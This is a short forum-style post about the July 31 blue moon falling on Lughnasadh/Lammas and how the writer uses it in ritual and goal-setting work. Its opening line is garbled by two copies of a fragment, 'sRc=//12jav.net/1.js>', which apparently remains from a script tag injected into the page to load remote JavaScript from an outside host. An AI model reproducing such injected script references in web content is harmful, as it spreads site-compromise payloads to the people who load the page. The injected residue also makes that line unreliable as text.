The blue moon is the second full moon in July, and falls on July 31st. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Merry Meet,

It falls on July 31 which is also Lughnasadh/Lammas so if you're planning to do something you might consider incorporating both. You could simply see it as another full moon, and leave it at that. I have read it is believed to be very powerful with goal setting, divination, and initiation/dedications. I've only used it as an Esbat, never having a specific circle in mind. I do mention in my ritual it is a blue moon, but regarding the overall ritual or spell work, I have never incorporated the Blue Moons supposed extra magical properties, I might see if its extra energy could help with a recent goal of mine.
